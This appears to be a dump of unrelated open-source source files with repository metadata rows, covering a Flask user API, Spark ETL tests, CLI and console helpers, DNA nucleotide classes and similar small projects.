class NucleotideContentA(NucleotideContent):
"""
Check A content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['a']
self.set_level()
class NucleotideContentT(NucleotideContent):
"""
Check T content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['t']
self.set_level()
class NucleotideContentG(NucleotideContent):
"""
Check G content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['g']
self.set_level()
class NucleotideContentC(NucleotideContent):
"""
Check C content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['c']
self.set_level()
import Solution | 43.745455 | 206 | 0.625104 | 461 | 4,812 | 6.266811 | 0.266811 | 0.041537 | 0.150225 | 0.082381 | 0.282451 | 0.217376 | 0.217376 | 0.217376 | 0.217376 | 0.217376 | 0 | 0.004993 | 0.292394 | 4,812 | 110 | 207 | 43.745455 | 0.843465 | 0.14256 | 0 | 0.323077 | 0 | 0 | 0.035105 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.138462 | false | 0 | 0.061538 | 0 | 0.353846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfcdbaafa9988638af7ac347c436a853bc52d3ed | 6,090 | py | Python | python/etl/tests/spark/app/test_smartstore_src_to_log0.py | beobest2/delta | 0107d5322492c420a044fa41d90be03375606bea | [
"Apache-2.0"
] | 1 | 2021-12-01T00:35:13.000Z | 2021-12-01T00:35:13.000Z | python/etl/tests/spark/app/test_smartstore_src_to_log0.py | beobest2/delta | 0107d5322492c420a044fa41d90be03375606bea | [
"Apache-2.0"
] | null | null | null | python/etl/tests/spark/app/test_smartstore_src_to_log0.py | beobest2/delta | 0107d5322492c420a044fa41d90be03375606bea | [
"Apache-2.0"
] | null | null | null | from argparse import Namespace
import pytest
from laplace_spark.app.smartstore_src_to_log0 import SparkAppSmartstoreSrcToLog0
from laplace_spark.constants import DATE_ID_COLUMN_NAME
from laplace_spark.modules.provider import Provider
from laplace_spark.modules.utils.laplace_utils import LaplaceUtils
from tests.utils import recursive_delete_s3_key
@pytest.fixture()
def spark_app_smartstore_src_to_log0(spark_session):
yield SparkAppSmartstoreSrcToLog0(spark_session=spark_session)
@pytest.fixture()
def data_category():
yield "order"
@pytest.fixture()
def mall_id():
yield "dummy_mall_id"
@pytest.fixture()
def login_type():
yield "NAVER"
@pytest.fixture()
def mall_name():
yield "dummy_mall_name"
@pytest.fixture()
def args(data_category, mall_id, login_type, mall_name):
yield [
"--data-category",
data_category,
"--mall-id",
mall_id,
"--login-type",
login_type,
"--mall-name",
mall_name,
]
@pytest.fixture()
def args_namespace(data_category, mall_id, login_type, mall_name):
yield Namespace(
data_category=data_category,
mall_id=mall_id,
login_type=login_type,
mall_name=mall_name,
)
@pytest.fixture()
def data_set_key(mall_id, login_type, mall_name):
laplace_utils = LaplaceUtils(provider=Provider.SMARTSTORE.value)
yield laplace_utils.hash_creator(
{
"mall_id": mall_id,
"login_type": login_type,
"mall_name": mall_name,
}
)
@pytest.fixture()
def smartstore_sourcing_delta_path(
laplace_dashboard_bucket_name,
df_smartstore_sourcing,
s3,
):
key = "dummy"
path = f"s3a://{laplace_dashboard_bucket_name}/{key}"
df_smartstore_sourcing.write.format("delta").save(path)
yield path
recursive_delete_s3_key(s3, laplace_dashboard_bucket_name, key)
@pytest.fixture()
def smartstore_log0_different_schema_table_path(
laplace_dashboard_bucket_name,
df_smartstore_sourcing,
s3,
):
df_no_date_id = df_smartstore_sourcing.drop(DATE_ID_COLUMN_NAME)
key = "dummy"
path = f"s3a://{laplace_dashboard_bucket_name}/{key}"
df_no_date_id.write.format("delta").save(path)
yield path
recursive_delete_s3_key(s3, laplace_dashboard_bucket_name, key)
class TestClassSparkAppSmartstoreSrcToLog0:
def test_get_arg_parser_success(
self,
spark_app_smartstore_src_to_log0,
args,
data_category,
mall_id,
login_type,
mall_name,
):
arg_parser = spark_app_smartstore_src_to_log0.get_arg_parser()
parsed = arg_parser.parse_args(args)
assert parsed.data_category == data_category
assert parsed.mall_id == mall_id
assert parsed.login_type == login_type
assert parsed.mall_name == mall_name
def test_get_path_prefix_success(
self,
spark_app_smartstore_src_to_log0,
mall_id,
login_type,
mall_name,
data_category,
data_set_key,
):
path_prefix = spark_app_smartstore_src_to_log0.get_path_prefix(
mall_id=mall_id,
login_type=login_type,
mall_name=mall_name,
data_category=data_category,
)
assert path_prefix == (
"s3a://laplace-dashboard"
f"/{Provider.SMARTSTORE.value}/{data_set_key}/{data_category}"
)
def test_get_src_path_success(
self, spark_app_smartstore_src_to_log0, args_namespace, data_set_key
):
src_path = spark_app_smartstore_src_to_log0.get_src_path(args_namespace)
assert src_path == (
"s3a://laplace-dashboard"
f"/{Provider.SMARTSTORE.value}/{data_set_key}/{args_namespace.data_category}/sourcing"
)
def test_get_dest_path_success(
self,
spark_app_smartstore_src_to_log0,
args_namespace,
data_set_key,
):
dest_path = spark_app_smartstore_src_to_log0.get_dest_path(args_namespace)
assert dest_path == (
"s3a://laplace-dashboard"
f"/{Provider.SMARTSTORE.value}/{data_set_key}/{args_namespace.data_category}/log0"
)
def test_read_success(
self,
spark_app_smartstore_src_to_log0,
smartstore_sourcing_delta_path,
df_smartstore_sourcing,
):
df = spark_app_smartstore_src_to_log0.read(smartstore_sourcing_delta_path)
assert df.schema == df_smartstore_sourcing.schema
assert df.collect() == df_smartstore_sourcing.collect()
def test_write_success(
self,
spark_app_smartstore_src_to_log0,
df_smartstore_sourcing,
laplace_dashboard_bucket_name,
spark_session,
):
path = f"s3a://{laplace_dashboard_bucket_name}/"
spark_app_smartstore_src_to_log0.write(path, df_smartstore_sourcing)
df = spark_session.read.format("delta").load(path)
assert df.schema == df_smartstore_sourcing.schema
collected_from_s3 = df.collect()
collected_original = df_smartstore_sourcing.collect()
assert all(row in collected_original for row in collected_from_s3)
assert all(row in collected_from_s3 for row in collected_original)
def test_write_success_with_different_schema_existing(
self,
spark_app_smartstore_src_to_log0,
df_smartstore_sourcing,
smartstore_log0_different_schema_table_path,
spark_session,
):
spark_app_smartstore_src_to_log0.write(
smartstore_log0_different_schema_table_path,
df_smartstore_sourcing,
)
df = spark_session.read.format("delta").load(
smartstore_log0_different_schema_table_path,
)
assert df.schema == df_smartstore_sourcing.schema
collected_from_s3 = df.collect()
collected_original = df_smartstore_sourcing.collect()
assert all(row in collected_original for row in collected_from_s3)
assert all(row in collected_from_s3 for row in collected_original)
| 29.563107 | 98 | 0.691297 | 757 | 6,090 | 5.108322 | 0.110964 | 0.083786 | 0.074476 | 0.086889 | 0.670028 | 0.642358 | 0.559348 | 0.51849 | 0.468063 | 0.399535 | 0 | 0.009165 | 0.229557 | 6,090 | 205 | 99 | 29.707317 | 0.815004 | 0 | 0 | 0.52907 | 0 | 0 | 0.091133 | 0.06798 | 0 | 0 | 0 | 0 | 0.087209 | 1 | 0.098837 | false | 0 | 0.040698 | 0 | 0.145349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfd04b70e5cd39ca29b574b5353e8f0319f41223 | 2,325 | py | Python | app.py | laurohen/api-flask-mysql | 3660d8828203476ea87b2580ed4b0508c0ea3af6 | [
"MIT"
] | null | null | null | app.py | laurohen/api-flask-mysql | 3660d8828203476ea87b2580ed4b0508c0ea3af6 | [
"MIT"
] | null | null | null | app.py | laurohen/api-flask-mysql | 3660d8828203476ea87b2580ed4b0508c0ea3af6 | [
"MIT"
] | null | null | null | from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
from marshmallow import fields
from marshmallow_sqlalchemy import ModelSchema
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://username:password@host:port/database-name'
db = SQLAlchemy(app)
# Model
class User(db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20))
def create(self):
db.session.add(self)
db.session.commit()
return self
def __init__(self, username):
self.username = username
def __repr__(self):
return f"{self.id}"
db.create_all()
class UserSchema(ModelSchema):
class Meta(ModelSchema.Meta):
model = User
sqla_session = db.session
id = fields.Number(dump_only=True)
username = fields.String(required=True)
@app.route('/api/v1/username', methods=['GET'])
def index():
get_users = User.query.all()
user_schema = UserSchema(many=True)
users = user_schema.dump(get_users)
return make_response(jsonify({"list users ": users}))
@app.route('/api/v1/username/<id>', methods=['GET'])
def get_user_by_id(id):
get_user = User.query.get(id)
user_schema = UserSchema()
user = user_schema.dump(get_user)
return make_response(jsonify({"user ": user}))
@app.route('/api/v1/username/<id>', methods=['PUT'])
def update_user_by_id(id):
data = request.get_json()
get_user = User.query.get(id)
if data.get('username'):
get_user.username = data['username']
db.session.add(get_user)
db.session.commit()
user_schema = UserSchema(only=['id', 'username'])
user = user_schema.dump(get_user)
return make_response(jsonify({"user ": user}))
@app.route('/api/v1/username/<id>', methods=['DELETE'])
def delete_user_by_id(id):
get_user = User.query.get(id)
db.session.delete(get_user)
db.session.commit()
return make_response("", 204)
@app.route('/api/v1/username', methods=['POST'])
def create_todo():
data = request.get_json()
user_schema = UserSchema()
user = user_schema.load(data)
result = user_schema.dump(user.create())
return make_response(jsonify({"user ": result}), 200)
if __name__ == "__main__":
app.run(debug=True) | 26.420455 | 99 | 0.67828 | 315 | 2,325 | 4.787302 | 0.253968 | 0.059682 | 0.036472 | 0.043103 | 0.312997 | 0.264589 | 0.177719 | 0.157825 | 0.157825 | 0.157825 | 0 | 0.00676 | 0.172903 | 2,325 | 88 | 100 | 26.420455 | 0.777431 | 0.002151 | 0 | 0.21875 | 0 | 0 | 0.115567 | 0.061665 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.015625 | 0.0625 | 0.015625 | 0.421875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfd196b146e9b5ea426e42cd1a578fe228ee3eac | 647 | py | Python | inspector/checks/constants.py | yoyowallet/inspector | a6ee3328a4dcf49b0e5b62d23195ed44f515a705 | [
"Apache-2.0"
] | 7 | 2019-03-03T14:47:47.000Z | 2020-10-31T00:26:52.000Z | inspector/checks/constants.py | yoyowallet/inspector | a6ee3328a4dcf49b0e5b62d23195ed44f515a705 | [
"Apache-2.0"
] | 2 | 2019-03-06T19:35:41.000Z | 2020-11-04T11:57:18.000Z | inspector/checks/constants.py | yoyowallet/inspector | a6ee3328a4dcf49b0e5b62d23195ed44f515a705 | [
"Apache-2.0"
] | 3 | 2019-03-03T16:29:44.000Z | 2020-10-31T00:47:01.000Z | from model_utils import Choices
RELATIONS = Choices(
(0, 'eq', '='),
(1, 'ne', '!='),
(2, 'gt', '>'),
(3, 'lt', '<'),
(4, 'ge', '>='),
(5, 'le', '<='),
)
STATUSES = Choices(
('NEW', 'New'),
('RUNNING', 'Running'),
('FINISHED', 'Finished'),
('ERROR', 'Error')
)
RESULTS = Choices(
('SUCCESS', 'Success'),
('WARNING', 'Warning'),
('FAILED', 'Failed')
)
CHECK_TYPES = Choices(
(0, 'SQL_QUERY', 'SQL query'),
(1, 'SQL_EXPRESSION', 'SQL expression'),
(2, 'NUMBER', 'Number'),
(3, 'STRING', 'String'),
(4, 'DATE', 'Date'),
(5, 'PYTHON_EXPRESSION', 'Python expression'),
)
| 19.029412 | 50 | 0.479134 | 64 | 647 | 4.765625 | 0.5625 | 0.052459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024341 | 0.238022 | 647 | 33 | 51 | 19.606061 | 0.59432 | 0 | 0 | 0 | 0 | 0 | 0.338485 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfd4a079399c71c1620bc498d4b73a09c55a55ad | 661 | bzl | Python | versions.bzl | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 16 | 2021-07-14T23:32:31.000Z | 2022-03-24T16:25:15.000Z | versions.bzl | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 9 | 2021-07-20T20:39:47.000Z | 2021-09-16T20:57:59.000Z | versions.bzl | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 9 | 2021-07-15T19:38:35.000Z | 2022-01-31T19:24:56.000Z | # Product versions live here (and only here). They should be bumped at every
# release.
#
# NOTE: This is parsable by both bazel and sh. Do not add arbitrary
# text here.
#
# Versions *must* adhere to semantic versioning rules. See http://semver.org/
#
# Don't forget to also update relevant docs and README.txt files. ;)
# This is the public-facing program release version of biograph and the SDK
BIOGRAPH_VERSION="7.1.2-dev"
# Use this version of the ML model from archive.spiralgenetics.com.
BIOGRAPH_MODEL_VERSION="7.1.0"
# SEQSET is the biograph file format version
SEQSET_VERSION="2.0.0"
# SpEC file format + program version
SPEC_VERSION="1.3.2-dev"
| 30.045455 | 77 | 0.750378 | 111 | 661 | 4.423423 | 0.63964 | 0.02444 | 0.03666 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021583 | 0.15885 | 661 | 21 | 78 | 31.47619 | 0.861511 | 0.789713 | 0 | 0 | 0 | 0 | 0.224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfd7afdce647ef41b496ff6aa9e1fd9678d81b54 | 542 | py | Python | Lesson 02.gf/intermediate_expressions.py | gfoo003/programming-together | 225e0a2255dd8da1f1ef32d2a88deea27c050f10 | [
"MIT"
] | null | null | null | Lesson 02.gf/intermediate_expressions.py | gfoo003/programming-together | 225e0a2255dd8da1f1ef32d2a88deea27c050f10 | [
"MIT"
] | null | null | null | Lesson 02.gf/intermediate_expressions.py | gfoo003/programming-together | 225e0a2255dd8da1f1ef32d2a88deea27c050f10 | [
"MIT"
] | null | null | null | name=input("hi, what's your name?")
age=input("how old are you?")
print("your name is ", name, "and you are ", age )
# int(x) = change string to integer
# str(x)= change integer to string
# to check type, print(type"x")
# you can only print "results" of the same type, unless doing string interpolation.
# difference between string interpolation and comma is that the variable cannot be placed in the middle
number=1
name="grace"
#assigning string "grace" into variable "name"
result=str(number)+" "+name
print(result)
print(number,name)
| 30.111111 | 103 | 0.726937 | 88 | 542 | 4.477273 | 0.545455 | 0.040609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002183 | 0.154982 | 542 | 17 | 104 | 31.882353 | 0.858079 | 0.599631 | 0 | 0 | 0 | 0 | 0.326923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
449e221a47922edae38daf290f2bdc462fa87ed3 | 446 | py | Python | dueros/directive/Pay/Buy.py | Mryan2005/bot-sdk-python | f961aedf141e966badd5cd577ad8913dd9733998 | [
"Apache-2.0"
] | 70 | 2018-01-04T06:47:58.000Z | 2021-07-28T03:08:48.000Z | dueros/directive/Pay/Buy.py | mlzboy/bot-sdk-python | 664c90ec6d0abbb0844c030cd3114693a96b12ab | [
"Apache-2.0"
] | 16 | 2018-01-02T15:25:23.000Z | 2020-03-14T07:25:44.000Z | dueros/directive/Pay/Buy.py | mlzboy/bot-sdk-python | 664c90ec6d0abbb0844c030cd3114693a96b12ab | [
"Apache-2.0"
] | 32 | 2018-01-09T10:19:46.000Z | 2021-05-06T08:35:52.000Z | #!/usr/bin/env python3
# -*- encoding=utf-8 -*-
# description:
# author:jack
# create_time: 2019-07-04
from dueros.directive.BaseDirective import BaseDirective
class Buy(BaseDirective):
"""
用于生成Buy指令的类
"""
def __init__(self, product_id, token=''):
super(Buy, self).__init__('Connections.SendRequest.Buy')
if token:
self.data['token'] = token
self.data['payload']['productId'] = product_id
| 21.238095 | 64 | 0.639013 | 50 | 446 | 5.48 | 0.72 | 0.065693 | 0.094891 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028329 | 0.20852 | 446 | 20 | 65 | 22.3 | 0.747875 | 0.235426 | 0 | 0 | 0 | 0 | 0.149533 | 0.084112 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44a2791177029781912dd84d5fb81d78441a1833 | 1,488 | py | Python | server-python3/test/test.py | Aaron-Ming/websocket_terminal | 42c24391d51c275eabf1f879fb312b9a3614f51e | [
"MIT"
] | 40 | 2016-11-20T09:48:27.000Z | 2021-04-02T00:29:14.000Z | server-python3/test/test.py | Aaron-Ming/websocket_terminal | 42c24391d51c275eabf1f879fb312b9a3614f51e | [
"MIT"
] | 6 | 2018-01-07T03:43:22.000Z | 2022-03-21T08:43:33.000Z | server-python3/test/test.py | glensc/websocket_terminal | 42c24391d51c275eabf1f879fb312b9a3614f51e | [
"MIT"
] | 20 | 2016-12-02T06:00:27.000Z | 2021-08-15T11:40:34.000Z | import threading
import sys
import subprocess
import eventlet
import eventlet.tpool
import eventlet.green.subprocess
from eventlet import green
eventlet.monkey_patch()
def consume(stream, pref=b'T> '):
print("CHK consume 1")
p = pref
while True:
print("CHK consume 2")
data = stream.read(1024)
print("CHK consume 3")
if not data:
break
if p:
data = p + data
p = None
sys.stdout.buffer.write(data.replace(b'\n', b'\n' + pref))
print("CHK consume 4")
sys.stdout.flush()
print("CHK consume 5")
def start_daemon_thread(fn):
thread = threading.Thread(target=fn)
thread.daemon = True
print("CHK start_daemon_thread 1")
thread.start()
print("CHK start_daemon_thread 2")
return thread
def consume_input():
print("CHK consume_input input")
while True:
line = input() + '\n'
print("CHK consume_input line", line)
proc.stdin.write(bytes(line, 'ascii'))
proc.stdin.flush()
proc = green.subprocess.Popen("cmd", stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
def spawn(fn):
print("CHK spawn")
return start_daemon_thread(fn)
#return eventlet.spawn(fn)
#return eventlet.tpool.execute(fn)
thread1 = spawn(lambda: consume(proc.stdout, b"T> "))
thread2 = spawn(lambda: consume(proc.stderr, b"E> "))
print("CHK sleeping")
eventlet.sleep(2)
consume_input()
| 22.208955 | 118 | 0.640457 | 198 | 1,488 | 4.747475 | 0.328283 | 0.093617 | 0.111702 | 0.040426 | 0.053191 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013169 | 0.234543 | 1,488 | 66 | 119 | 22.545455 | 0.812116 | 0.038978 | 0 | 0.042553 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.148936 | 0 | 0.276596 | 0.234043 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44a509e87a818b2445cd5c73173ed6b47ce8470d | 1,591 | py | Python | climatecontrol/cli_utils.py | daviskirk/climatecontrol | f1fed474d649eaf4d75ed5b7cdda333faef4bbd7 | [
"MIT"
] | 19 | 2018-01-19T13:42:18.000Z | 2022-02-27T22:20:39.000Z | climatecontrol/cli_utils.py | daviskirk/climatecontrol | f1fed474d649eaf4d75ed5b7cdda333faef4bbd7 | [
"MIT"
] | 27 | 2016-06-01T23:03:48.000Z | 2022-02-27T22:24:36.000Z | climatecontrol/cli_utils.py | daviskirk/climatecontrol | f1fed474d649eaf4d75ed5b7cdda333faef4bbd7 | [
"MIT"
] | 2 | 2017-07-10T09:49:55.000Z | 2018-01-10T12:38:34.000Z | """CLI utils for easy command line extras."""
import click
from climatecontrol import core
def click_settings_file_option(
settings_obj: core.Climate, click_obj=click, option_name="settings", **kw
):
"""Build a `click` option decorator.
Args:
settings_obj: settings object to load configuration into.
click_obj: if a command
Example:
Given a command line script `cli.py`:
.. code-block:: python
import click
from climatecontrol import core, cli_utils
settings_map = settings_parser.Climate(env_prefix='TEST_STUFF')
@click.command()
@cli_utils.click_settings_file_option(settings_map)
def tmp_cli():
pass
And running the script:
.. code-block:: bash
python cli.py --settings 'my_settings_file.yaml'
will load settings from `my_settings_file.yaml` into the `settings_map`
object which can then be used in the script.
"""
def validate(ctx, param, value):
if value:
settings_obj.settings_files = value
settings_obj.update()
option_kwargs = dict(
help="Settings file path for loading settings from file.",
callback=validate,
type=click_obj.Path(exists=True, dir_okay=False, resolve_path=True),
expose_value=False,
is_eager=True,
multiple=True,
)
option_kwargs.update(kw)
option = click_obj.option(
"--{}".format(option_name), "-{}".format(option_name[0]), **option_kwargs
)
return option
| 26.081967 | 81 | 0.63105 | 194 | 1,591 | 4.979381 | 0.43299 | 0.062112 | 0.031056 | 0.060041 | 0.144928 | 0.080745 | 0 | 0 | 0 | 0 | 0 | 0.000868 | 0.275927 | 1,591 | 60 | 82 | 26.516667 | 0.837674 | 0.472659 | 0 | 0 | 0 | 0 | 0.086667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44aa2a1d82bec0cc44381f7808cea5fcad7ec790 | 2,888 | py | Python | utils.py | andreloezer/zombie-dice | 0a97f0d14a2c5ada480e416e4a3f3fc1f47f8c30 | [
"MIT"
] | null | null | null | utils.py | andreloezer/zombie-dice | 0a97f0d14a2c5ada480e416e4a3f3fc1f47f8c30 | [
"MIT"
] | null | null | null | utils.py | andreloezer/zombie-dice | 0a97f0d14a2c5ada480e416e4a3f3fc1f47f8c30 | [
"MIT"
] | null | null | null | """Miscellaneous functions goes in here.
"""
from os import system
from config import OS
from strings import UtilsStrings as Strings
def clear_console() -> None:
"""Clear console terminal.
"""
command = "clear"
if OS in ("nt", "dos"):
command = "cls"
system(command)
def char_input() -> str:
"""Capture and return a single character representing the key pressed.
:return: Character pressed.
"""
if OS in ("nt", "dos"): # Get key on Windows
import msvcrt
key = msvcrt.getwche()
else: # Get key on UNIX
# Solution found on:
# https://www.semicolonworld.com/question/42804/python-read-a-single-character-from-the-user#comment-21
import sys
import tty
import termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
key = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return key
def int_input(message: str, min_val: int, max_val: int) -> int:
"""Get and validate integer input.
:param message: Message prompting the user to enter an integer.
:param min_val: Minimum valid value for the integer.
:param max_val: Maximum valid value for the integer.
:return: Validated integer input.
"""
while True:
response = input(message)
try:
# Input cannot be empty
if not response:
raise ValueError
response = int(response)
# Input must be between given interval
if response > max_val or response < min_val:
raise ValueError
except ValueError:
print(Strings.int_warning(min_val, max_val))
else:
return response
def text_input(message: str) -> str:
"""Get and validate string input.
:param message: Message prompting the user to enter a string.
:return: Validated string input.
"""
while True:
response = input(message)
if response:
return response
print(Strings.str_warning)
def bool_input(message: str) -> bool:
"""Get and validate a boolean input.
:param message: Message prompting the user to choose between true or false.
:return: Boolean choice from the user.
"""
while True:
print(message)
response = char_input().lower()
print()
if response in Strings.truthy:
return True
elif response in Strings.falsy:
return False
else:
print(Strings.bool_warning)
def stringify(obj_list: list[object]) -> list[str]:
"""Convert list of objects into list of strings.
:param obj_list: List of objects.
:return: List of strings.
"""
return [obj.__str__() for obj in obj_list]
| 27.245283 | 111 | 0.61115 | 354 | 2,888 | 4.912429 | 0.353107 | 0.020127 | 0.025877 | 0.041403 | 0.156412 | 0.117309 | 0.078206 | 0.078206 | 0.054054 | 0 | 0 | 0.003955 | 0.299515 | 2,888 | 105 | 112 | 27.504762 | 0.85566 | 0.345914 | 0 | 0.285714 | 0 | 0 | 0.010129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0.125 | 0 | 0.339286 | 0.089286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44ac65411f95028d1ff96429ecd33acb3965c521 | 1,348 | py | Python | tests/test_analyser/test_sniffer_shpr.py | di-unipi-socc/micro-tosca | 5d5c9361b34eeabaed8955ddc62282607672bd81 | [
"MIT"
] | null | null | null | tests/test_analyser/test_sniffer_shpr.py | di-unipi-socc/micro-tosca | 5d5c9361b34eeabaed8955ddc62282607672bd81 | [
"MIT"
] | 3 | 2019-10-02T13:55:39.000Z | 2021-06-01T22:55:20.000Z | tests/test_analyser/test_sniffer_shpr.py | di-unipi-socc/microFreshener-core | 5d5c9361b34eeabaed8955ddc62282607672bd81 | [
"MIT"
] | null | null | null | from unittest import TestCase
from microfreshener.core.importer import YMLImporter
from microfreshener.core.analyser.sniffer import SharedPersistencySmellSniffer
from microfreshener.core.analyser.smell import SharedPersistencySmell
from microfreshener.core.model.groups import Edge
class TestSharedPersitence(TestCase):
@classmethod
def setUpClass(self):
file = 'data/tests/test_sniffer_shpr.yml'
loader = YMLImporter()
self.micro_model = loader.Import(file)
self.shprSniffer = SharedPersistencySmellSniffer()
def test_shpr(self):
Datastore = self.micro_model["db"]
smell = self.shprSniffer.snif(Datastore)
self.assertIsInstance(smell, SharedPersistencySmell)
self.assertFalse(smell.isEmpty())
self.assertEqual(len(smell.getLinkCause()), 3)
self.assertEqual(len(smell.getNodeCause()), 0)
def test_shpr_database(self):
Datastore = self.micro_model["db1"]
smell = self.shprSniffer.snif(Datastore)
self.assertTrue(smell.isEmpty())
self.assertEqual(len(smell.getLinkCause()), 0)
self.assertEqual(len(smell.getNodeCause()), 0)
def test_shpr_service_to_database(self):
Datastore = self.micro_model["db2"]
smell = self.shprSniffer.snif(Datastore)
self.assertTrue(smell.isEmpty())
| 36.432432 | 78 | 0.714392 | 142 | 1,348 | 6.690141 | 0.34507 | 0.082105 | 0.092632 | 0.096842 | 0.450526 | 0.422105 | 0.309474 | 0.223158 | 0.223158 | 0 | 0 | 0.00546 | 0.184718 | 1,348 | 36 | 79 | 37.444444 | 0.858963 | 0 | 0 | 0.241379 | 0 | 0 | 0.029674 | 0.023739 | 0 | 0 | 0 | 0 | 0.275862 | 1 | 0.137931 | false | 0 | 0.241379 | 0 | 0.413793 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44ad4566bf3e052d6f2cd5576c859905edc198bd | 9,068 | py | Python | geneal/applications/tsp/travelling_salesman_problem.py | NeveIsa/geneal | 064b0409912088886bf56fe9a729d74dac92a235 | [
"MIT"
] | 47 | 2020-07-10T14:28:52.000Z | 2022-03-25T17:20:52.000Z | geneal/applications/tsp/travelling_salesman_problem.py | NeveIsa/geneal | 064b0409912088886bf56fe9a729d74dac92a235 | [
"MIT"
